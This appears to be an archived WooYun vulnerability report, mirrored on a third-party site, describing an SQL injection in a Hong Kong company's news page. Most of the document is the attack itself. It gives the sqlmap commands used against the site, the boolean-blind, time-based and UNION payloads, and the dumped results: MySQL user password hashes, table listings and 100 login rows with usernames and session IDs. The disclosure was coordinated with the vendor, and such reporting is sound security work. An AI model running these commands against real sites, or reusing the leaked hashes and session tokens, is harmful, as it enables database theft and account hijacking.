乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-03: 细节已通知厂商并且等待厂商处理中 2015-11-04: 厂商已经确认,细节仅向厂商公开 2015-11-14: 细节向核心白帽子及相关领域专家公开 2015-11-24: 细节向普通白帽子公开 2015-12-04: 细节向实习白帽子公开 2015-12-19: 细节向公众公开
海港錦鯉集團某處存在SQL插入漏洞(rdsadmin密碼泄露/55個表/22萬用戶ip地址及sessionid泄露)
地址:http://**.**.**.**/news_details.php?news_id=121
python sqlmap.py -u "http://**.**.**.**/news_details.php?news_id=121" -p news_id --technique=BTU --random-agent --batch --users --passwords
python sqlmap.py -u "http://**.**.**.**/news_details.php?news_id=121" -p news_id --technique=BTU --random-agent --batch -D koi_db -T user_login -C ipaddress,logintime,username,usession_id --start 1 --stop 100 --dump
back-end DBMS: MySQL 5.0.12Database: koi_db+------------+---------+| Table | Entries |+------------+---------+| user_login | 225089 |+------------+---------+
---Parameter: news_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: news_id=121 AND 8135=8135 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: news_id=121 AND (SELECT * FROM (SELECT(SLEEP(5)))HFsw) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: news_id=-4801 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a7a6b71,0x594b7562794f75535954476745476e645a426950726276454c417869484e666470536a56436b5848,0x71786b6271),NULL,NULL-- ----web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)web application technology: PHP 5.3.10, Apache 2.2.22back-end DBMS: MySQL 5.0.12database management system users [2]:[*] 'koidbuser'@'%'[*] 'rdsadmin'@'localhost'database management system users password hashes:[*] koidbuser [1]: password hash: *B4424A0597FD6459C51B530FDC8831BF925CEFAF[*] rdsadmin [1]: password hash: *3F809E3C7A7660DFADEC1A097315F38B7F26576E
---Parameter: news_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: news_id=121 AND 8135=8135 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: news_id=121 AND (SELECT * FROM (SELECT(SLEEP(5)))HFsw) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: news_id=-4801 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a7a6b71,0x594b7562794f75535954476745476e645a426950726276454c417869484e666470536a56436b5848,0x71786b6271),NULL,NULL-- ----web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)web application technology: PHP 5.3.10, Apache 2.2.22back-end DBMS: MySQL 5.0.12available databases [8]:[*] information_schema[*] innodb[*] koi_db[*] koishop[*] mysql[*] pennydb[*] performance_schema[*] tmpsqlmap resumed the following injection point(s) from stored session:---Parameter: news_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: news_id=121 AND 8135=8135 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: news_id=121 AND (SELECT * FROM (SELECT(SLEEP(5)))HFsw) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: news_id=-4801 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a7a6b71,0x594b7562794f75535954476745476e645a426950726276454c417869484e666470536a56436b5848,0x71786b6271),NULL,NULL-- ----web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)web application technology: PHP 5.3.10, Apache 2.2.22back-end DBMS: MySQL 5.0.12Database: koi_db[55 tables]+---------------------------+| activation || address_name || address_province || adv || alipay || anwser || banner || banner_old || banner_tmp || banner_tmp_old || bid || bid_action || bid_image || bid_temp || bid_title || bid_title_old || calendar || category || diary || edm_campaign || game || game_content || game_score || game_score_content || gift || gift_action || internal_photo || internal_photo_content || knowledge || location || mem_temp || member || news || paypal_bid || paypal_cart_info || paypal_payment_info || point_history || product || product_image || question || salesorder || salesorder_items || sc_main || sc_users || sms_verify || staff || table_forum || table_log || user_login || votevideo || votevideo_title || votevideo_type || votevideoact || votevideoact_bak_20131129 || votevideoact_bak_20141229 |+---------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: news_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: news_id=121 AND 8135=8135 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: news_id=121 AND (SELECT * FROM (SELECT(SLEEP(5)))HFsw) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: news_id=-4801 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a7a6b71,0x594b7562794f75535954476745476e645a426950726276454c417869484e666470536a56436b5848,0x71786b6271),NULL,NULL-- ----web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)web application technology: PHP 5.3.10, Apache 2.2.22back-end DBMS: MySQL 5.0.12Database: koi_dbTable: user_login[4 columns]+-------------+--------------+| Column | Type |+-------------+--------------+| ipaddress | varchar(50) || logintime | datetime || username | varchar(255) || usession_id | varchar(100) |+-------------+--------------+
选择前100用户进行dump。
Database: koi_dbTable: user_login[100 entries]+-----------------+---------------------+------------+----------------------------------+| ipaddress | logintime | username | usession_id |+-----------------+---------------------+------------+----------------------------------+| **.**.**.** | 2011-05-26 15:27:45 | 0000000145 | 928f166c8528c448546567c08ac2673e || **.**.**.** | 2011-05-26 15:52:23 | 0000000001 | 928f166c8528c448546567c08ac2673e || **.**.**.** | 2011-05-26 15:57:33 | 0000000001 | 928f166c8528c448546567c08ac2673e || **.**.**.** | 2011-05-26 15:58:09 | 0000000145 | 928f166c8528c448546567c08ac2673e || **.**.**.** | 2011-05-26 16:03:39 | 0000000001 | 928f166c8528c448546567c08ac2673e || **.**.**.** | 2011-05-26 17:16:30 | 0000000147 | ac36efe8611ee33e9bb148cd7d84e7eb || **.**.**.** | 2011-05-26 17:17:03 | 0000000001 | 928f166c8528c448546567c08ac2673e || **.**.**.** | 2011-05-26 17:17:23 | 0000000145 | 928f166c8528c448546567c08ac2673e || **.**.**.** | 2011-05-26 17:56:54 | 0000000001 | 89c1c77fbab136b959c4dbde7a585bcf || **.**.**.** | 2011-05-26 21:28:45 | 0000000148 | 8a28bd69474b22b245ff729109b214e7 || **.**.**.** | 2011-05-27 01:50:56 | 0000000148 | 0ff481ef67805c5151e6b32e5f16b917 || **.**.**.** | 2011-05-27 02:29:35 | 0000000148 | 9c46d115d987cda89d549ec60882009b || **.**.**.** | 2011-05-27 10:17:47 | 0000000001 | d35b69d0483d9e0ebbb44eb9ec6ff506 || **.**.**.** | 2011-05-27 10:18:36 | 0000000001 | d35b69d0483d9e0ebbb44eb9ec6ff506 || **.**.**.** | 2011-05-27 11:05:56 | 0000000003 | 57c527d85dabd83b193f9b912dc5f6a9 || **.**.**.** | 2011-05-27 12:49:52 | 0000000001 | d35b69d0483d9e0ebbb44eb9ec6ff506 || **.**.**.** | 2011-05-27 12:57:24 | 0000000001 | d35b69d0483d9e0ebbb44eb9ec6ff506 || **.**.**.** | 2011-05-27 14:15:56 | 0000000001 | 27df9180bb34cc6bda9e15f4a89d7bd6 || **.**.**.** | 2011-05-27 14:16:23 | 0000000001 | 27df9180bb34cc6bda9e15f4a89d7bd6 || **.**.**.** | 2011-05-27 14:19:52 | 0000000001 | 27df9180bb34cc6bda9e15f4a89d7bd6 || **.**.**.** | 2011-05-27 14:46:59 | 0000000145 | 27df9180bb34cc6bda9e15f4a89d7bd6 || **.**.**.** | 2011-05-27 14:57:13 | 0000000001 | 27df9180bb34cc6bda9e15f4a89d7bd6 || **.**.**.** | 2011-05-27 15:36:32 | 0000000149 | c5096165fe92c0381b3e9c4d0133adc6 || **.**.**.** | 2011-05-27 21:39:52 | 0000000148 | 34a297109a9211ee415f32d7f2f6bbaa || **.**.**.** | 2011-05-27 21:44:29 | 0000000001 | 1fef9faa5f92e2b14a54e9edac5aed50 || **.**.**.** | 2011-05-27 22:35:25 | 0000000150 | 34a297109a9211ee415f32d7f2f6bbaa || **.**.**.** | 2011-05-27 23:17:46 | 0000000150 | 097b13d35a9631392f20573871024612 || **.**.**.** | 2011-05-28 11:34:57 | 0000000001 | 995fe683ceaf1d529371ac7a80b6be7e || **.**.**.** | 2011-05-28 11:55:16 | 0000000003 | fe7e5ca6df5cf8d40f530d12d7b416e5 || **.**.**.** | 2011-05-28 14:21:37 | 0000000001 | 995fe683ceaf1d529371ac7a80b6be7e || **.**.**.** | 2011-05-28 15:22:23 | 0000000001 | 485be880cf0fbf197a7e578504f440eb || **.**.**.** | 2011-05-28 16:13:35 | 0000000149 | 76dba8afbb1bcad14182435f861954d7 || **.**.**.** | 2011-05-28 16:18:11 | 0000000001 | 485be880cf0fbf197a7e578504f440eb || **.**.**.** | 2011-05-28 17:05:24 | 0000000149 | e2cee6db6a51cd0db687ee81c13b9fab || **.**.**.** | 2011-05-28 19:44:57 | 0000000001 | 8e0d07ddbd987f364267fa3f60941104 || **.**.**.** | 2011-05-29 01:02:32 | 0000000148 | bd8a1ab12afe4493b24f2e1bce687eb7 || **.**.**.** | 2011-05-29 03:33:01 | 0002011388 | 85ccc10034ce914675ceb40730b83590 || **.**.**.** | 2011-05-29 03:40:47 | 0002011389 | 251d2432251495fc805ad48f5e0377a5 || **.**.**.** | 2011-05-29 04:31:40 | 0000000118 | dbceba0f88fdef0519da83183d611168 || **.**.**.** | 2011-05-29 08:22:54 | 0002011392 | 87056716bb2fa15906a2e6935fea5064 || **.**.**.** | 2011-05-29 08:27:18 | 0002011391 | 97bd47f05e8082493133125cfc1277dd || **.**.**.** | 2011-05-29 08:37:38 | 0002011392 | be0b2d66e3b159652c907ee771964dfa || **.**.**.** | 2011-05-29 08:50:14 | 0002011395 | c6587be636f07bf9dd612bf73105d1cf || **.**.**.** | 2011-05-29 08:52:39 | 0002011390 | 8ec14a16eb2ad99966d4c734eb3bc339 || **.**.**.** | 2011-05-29 08:54:10 | 0002011394 | 0b88247396299ac41c949fe869471e80 || **.**.**.** | 2011-05-29 09:02:29 | 0002011390 | 8ec14a16eb2ad99966d4c734eb3bc339 || **.**.**.** | 2011-05-29 09:09:31 | 0000000049 | 1913c1fbd6daeb24e7c1d0404ddd6868 || **.**.**.** | 2011-05-29 09:19:02 | 0002011396 | b29801fbe58861ecbc8aa5ebecac34f3 || **.**.**.** | 2011-05-29 10:00:54 | 0002011397 | 742656c4b38116acab89706bc0d0b41c || **.**.**.** | 2011-05-29 11:26:13 | 0002011399 | 13bbc152ad02da4e1392d3af5a53bd1e || **.**.**.** | 2011-05-29 11:29:04 | 0002011399 | 13bbc152ad02da4e1392d3af5a53bd1e || **.**.**.** | 2011-05-29 11:38:52 | 0002011400 | 18213edae4eb2a30a4d2ca41c5eaba0a || **.**.**.** | 2011-05-29 11:40:15 | 0002011400 | a7a4d57ae06cbc8f04cde82ca8fb16f8 || **.**.**.** | 2011-05-29 11:48:33 | 0000000001 | 4152802c44f3bd2aa6d7c25db8619704 || **.**.**.** | 2011-05-29 12:08:23 | 0002011402 | 7a01f5e797e425e54805a268e1ac7eb8 || **.**.**.** | 2011-05-29 13:06:52 | 0002011404 | c5e3dddf1381b1b51604b7e39de310bc || **.**.**.** | 2011-05-29 14:36:37 | 0002011406 | 8f222136d871ff978270225cf48864dc || **.**.**.** | 2011-05-29 14:42:24 | 0002011407 | 7672afa01fde6b235f8284dec3c58486 || **.**.**.** | 2011-05-29 14:43:54 | 0002011407 | 7672afa01fde6b235f8284dec3c58486 || **.**.**.** | 2011-05-29 15:00:15 | 0002011408 | f34771b11d804688fd9c8690affc2391 || **.**.**.** | 2011-05-29 15:05:33 | 0002011409 | 09d4c896015247c7978b7df988c7c325 || **.**.**.** | 2011-05-29 15:05:59 | 0002011406 | 8f222136d871ff978270225cf48864dc || **.**.**.** | 2011-05-29 16:13:21 | 0002011410 | cec2d503840ad310981a307eb7354a59 || **.**.**.** | 2011-05-29 17:12:16 | 0000000090 | b2f694e679a964b81ccb2afa9d57e3bf || **.**.**.** | 2011-05-29 17:28:34 | 0002011411 | 0d61ae4a8e5ced00a6050e383d62d172 || **.**.**.** | 2011-05-29 17:40:42 | 0002011412 | 77f437d29f9b142d66755ae67ad0dcc0 || **.**.**.** | 2011-05-29 19:37:29 | 0002011413 | 893b7aaf2a5478c4a846c36c400d888a || **.**.**.** | 2011-05-29 19:46:00 | 0002011414 | 01c530a30b40fadee07b85e72f5a525e || **.**.**.** | 2011-05-29 20:05:22 | 0002011415 | 4c575e5b1fa68a3c8dfb8a19a794d798 || **.**.**.** | 2011-05-29 20:37:25 | 0002011416 | 931cd6e6fe70d4f302f8c5a5644949e8 || **.**.**.** | 2011-05-29 21:47:50 | 0002011403 | 4c85676dd14d020d32630316e93b6936 || **.**.**.** | 2011-05-29 22:04:37 | 0002011418 | 27e1d5e6ea3e6ec875e83baab2dc4479 || **.**.**.** | 2011-05-29 22:37:21 | 0002011407 | 7672afa01fde6b235f8284dec3c58486 || **.**.**.** | 2011-05-29 23:18:43 | 0002011419 | dbbbb00baa9838a7bb9a4d7708ca6d9c || **.**.**.** | 2011-05-29 23:30:17 | 0002011389 | 63b1de03c41d277c2acd3c77b0bdd9ce || **.**.**.** | 2011-05-30 00:37:58 | 0002011420 | 90323dcfa479beddecdf721b33b325f4 || **.**.**.** | 2011-05-30 09:27:29 | 0002011421 | a99bd9f2489f4301c282b1c72a240b1c || **.**.**.** | 2011-05-30 12:25:30 | 0002011423 | a40a8ea720459e22d442691e528a0ead || **.**.**.** | 2011-05-30 14:43:34 | 0002011424 | 2ccecce5877f60484438dd27bdaf61b9 || **.**.**.** | 2011-05-30 15:26:16 | 0002011425 | a7d42efd7e4b7d722ce1a9053d244deb || **.**.**.** | 2011-05-30 15:45:52 | 0002011426 | eb899018c9630654a115ecd937b892ad || **.**.**.** | 2011-05-30 16:27:15 | 0002011405 | 43721c187f7a2122fac7e4aa04e0268f || **.**.**.** | 2011-05-30 17:36:30 | 0002011427 | 98159ae1726c061ea216f2833ab240b4 || **.**.**.** | 2011-05-30 17:38:54 | 0002011407 | 7672afa01fde6b235f8284dec3c58486 || **.**.**.** | 2011-05-30 19:39:28 | 0000000148 | 57c2f3151ece14f7460fe02a353de80d || **.**.**.** | 2011-05-30 20:08:34 | 0002011428 | bdfc3146ce9ccbd59d1bb6bb358bb3c3 || **.**.**.** | 2011-05-30 20:56:55 | 0002011429 | f43c69d38929faabc82278ec77304dc1 || **.**.**.** | 2011-05-30 21:45:17 | 0000000024 | 5a3ef1757cbe0c1e0d4d761421275f58 || **.**.**.** | 2011-05-30 22:13:04 | 0002011430 | fbb343167cb87ba83d7749abc4239358 || **.**.**.** | 2011-05-30 22:20:58 | 0000000058 | 05823858ac97de7b02acb73eaa2e389d || **.**.**.** | 2011-05-30 22:51:17 | 0002011432 | f476f75fd5a98a00700e1e12695a72de || **.**.**.** | 2011-05-30 23:34:01 | 0002011434 | e5150245bfcab102f7de27bc44285be9 || **.**.**.** | 2011-05-30 23:36:58 | 0002011433 | 5a958fbedea352cc7bef48523db65016 || **.**.**.** | 2011-05-30 23:49:14 | 0000000148 | 57c2f3151ece14f7460fe02a353de80d || **.**.**.** | 2011-05-31 03:13:32 | 0002011435 | 1020f525106b0b2e48dde10c06a207f7 || **.**.**.** | 2011-05-31 09:27:05 | 0002011437 | ec0319ae11e39b16f9e62a3dfdd34bf2 || **.**.**.** | 2011-05-31 09:45:47 | 0002011437 | d06c20303124afce9a1c1aea104b40ae || **.**.**.** | 2011-05-31 09:46:06 | 0002011426 | f8694a04cf5c2c28ed28e53ec4ce1e55 || **.**.**.** | 2011-05-31 09:47:43 | 0000000148 | 57c2f3151ece14f7460fe02a353de80d || **.**.**.** | 2011-05-31 10:59:43 | 0002011411 | acbe4a0fdb18263f08bf13380be8f6ee |+-----------------+---------------------+------------+----------------------------------+
上WAF。
危害等级:高
漏洞Rank:12
确认时间:2015-11-04 17:47
已將事件通知有關機構
暂无